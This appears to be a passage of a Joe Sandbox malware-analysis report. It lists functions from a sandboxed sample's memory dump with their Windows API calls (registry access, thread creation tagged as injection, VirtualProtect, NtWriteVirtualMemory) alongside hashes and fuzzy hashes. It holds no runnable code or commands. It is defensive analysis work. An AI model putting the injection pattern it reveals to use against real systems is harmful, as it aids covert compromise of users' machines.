                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ContinueHandlerVectored
                            • String ID:
                            • API String ID: 3758255415-0
                            • Opcode ID: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                            • Instruction ID: a84e47351fe36d9486e0701b11ec7cee977e7f4fe5a46664de11766e2a2b32dc
                            • Opcode Fuzzy Hash: ebbe6ac522210a9cbc442d0fb8ea88652477f683457ebd90c6720f1d0b0afe41
                            • Instruction Fuzzy Hash: CC41D530608A058FEB64EF78988877A77E1FB99321B69452E9447C3262DF78C903CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DB8A08 Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,00018944,00DB8F1E,?,?,?,?,?,?,0000007E,00DAF548), ref: 00DB8A6C
                            • RegCloseKey.KERNELBASE ref: 00DB8AEF
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CloseOpen
                            • String ID:
                            • API String ID: 47109696-0
                            • Opcode ID: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                            • Instruction ID: 2e7e37d9a84ea60d559e34ee4004cae7a1dd0d6a7ffa608ec2e61d84c4576697
                            • Opcode Fuzzy Hash: f76ba22267845e3d4673c6a327b1bbe8f73b9ca967a76069b2753500b4667310
                            • Instruction Fuzzy Hash: 0B315030618B4C8FD794EF68D894A6A77E1FBA8300B054A7EE44EC3251DF34D945CB86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC8678 Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00DB1105), ref: 00DC86B6
                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,-00000008,00000000,00DB1105), ref: 00DC8723
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID:
                            • API String ID: 3356406503-0
                            • Opcode ID: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                            • Instruction ID: 9ce053391ebcafa0ec47b1b0593392c074f8c710c14b4d65209183ba2701c68d
                            • Opcode Fuzzy Hash: e3553bd799da92a9375b92d556bb2138d0cd29b9e71b71758a3b13e3e8479367
                            • Instruction Fuzzy Hash: 56215630618B098FD754EF28E849A25B7E1FB58351F14446EE449C3661EF34E941C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC7004 Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7027
                            • RegOpenKeyA.ADVAPI32(?,?,?,00DC9153), ref: 00DC7034
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateOpen
                            • String ID:
                            • API String ID: 436179556-0
                            • Opcode ID: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                            • Instruction ID: fa835681234338cdf3972c2545b518324ab1d361d462196c59a4d8428dfa3fcd
                            • Opcode Fuzzy Hash: e4419606d2f704daf9ddf2ecf459e8c6152cdf4d5e5403aeff81dd609e706585
                            • Instruction Fuzzy Hash: CE01A130608A094FDB54DB5C9488B69B7F1EBA8351F14046DE98AC3261DAB0C9448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC26BC Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: CreateQueueThreadUser
                            • String ID:
                            • API String ID: 3600083758-0
                            • Opcode ID: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                            • Instruction ID: b5c06fd6a460268a017fe2bf4c4267d7ad6eeb6997c8416d16a7d0a119b1dbc8
                            • Opcode Fuzzy Hash: 1042369a62fa130813053ba96abf502003b5e90ec07148417e067b6cd7aabf44
                            • Instruction Fuzzy Hash: AB014030754A094FEB54EFADA85DB39B7E2E798311B14416AA409C3264DF78DC41C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC4EB8 Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                            • Instruction ID: fd098eac07fd3aab2729a7ede2a0238082ce94bb58796d1eceee63c48673fbcd
                            • Opcode Fuzzy Hash: abe52cca80897bf381d4248daf34a54796b032552c6d90c33958d84888dac85f
                            • Instruction Fuzzy Hash: 4561863061CE099FD754EF18E495A66B7E0FB68311F50456EE88AC3265DB34E841CBD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DBB4B0 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                            Download Yara Rule
                            APIs
                            • RtlDeleteBoundaryDescriptor.NTDLL ref: 00DBB5F6
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: BoundaryDeleteDescriptor
                            • String ID:
                            • API String ID: 3203483114-0
                            • Opcode ID: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                            • Instruction ID: befaa17fc20373845ace761f2b8aed2db578d6240fe71efe722eab40e7a33e5f
                            • Opcode Fuzzy Hash: db30e70d32ecff436d382c0cc0cbe0bcce1e7c4dde14a7d37afc866764c18652
                            • Instruction Fuzzy Hash: EA41D030658A1CCFDB24EF68E8859E573E0F759320758411EE04BC3261DBA8EC85CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DBF31C Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                            • Instruction ID: 1c9cbcf7bfd628e4858204e6be256346942d015758a5aa920e5d1e79c86dc5e6
                            • Opcode Fuzzy Hash: eca3608900a0a775f67c8676a6116e6d08b3199a6ef1a3ec5734ddc5bbab5a3c
                            • Instruction Fuzzy Hash: 60317130314648CBEB48EF78ECD59AA73E2EB98300744C539A547C3251DF38D942CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA495C Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • FindCloseChangeNotification.KERNELBASE ref: 00DA4A08
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ChangeCloseFindNotification
                            • String ID:
                            • API String ID: 2591292051-0
                            • Opcode ID: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                            • Instruction ID: 6ee874a6a4b0b9a19bb06cbb8f29548dd30c63554c7959cb2765aef00bfc8cf4
                            • Opcode Fuzzy Hash: 8db922fd9091025d917ee3fa5b9b8cb8437445c7be8339cafab69875c143e589
                            • Instruction Fuzzy Hash: 14215931208B498FEB95EF28D888A6B77E4FBE8301B15052DE50AC3260DB74D9448B41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DC7340 Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                            • Instruction ID: a5e0f57a7a116848e4f3fa57d9390897248c7e5c9bf599042b84e4762d1d6b95
                            • Opcode Fuzzy Hash: 61193fbb3c11a6377def257641601a12032aaed3a0883b3445c2989be8d24a87
                            • Instruction Fuzzy Hash: 4D11813160CB498FAB04EF68E849529B7E5E79C300B04463EEC8AC3245EE70E9058B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DA4A48 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DA6D24: NtWriteVirtualMemory.NTDLL ref: 00DA6D43
                            • VirtualProtectEx.KERNELBASE ref: 00DA4A9C
                            Memory Dump Source
                            • Source File: 00000022.00000002.1120092798.0000000000DA1000.00000020.80000000.00040000.00000000.sdmp, Offset: 00DA1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_34_2_da1000_control.jbxd
                            Similarity
                            • API ID: Virtual$MemoryProtectWrite
                            • String ID:
                            • API String ID: 1789425917-0
                            • Opcode ID: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                            • Instruction ID: 02d05769910611efb30360ed9a3d01ec39368a4b3a71c0e1f5f6a7b4ec5f4eb2
                            • Opcode Fuzzy Hash: dc2d7a55bae03b42cae034855de4c2d582e22b98317ece67652a204506ff4dc2
                            • Instruction Fuzzy Hash: C4017C70A18B088FCB48EF5CE0C5525B7E0EB9C311B44056EE80DC7296CB70DD45CB96
                            Uniqueness

                            Uniqueness Score: -1.00%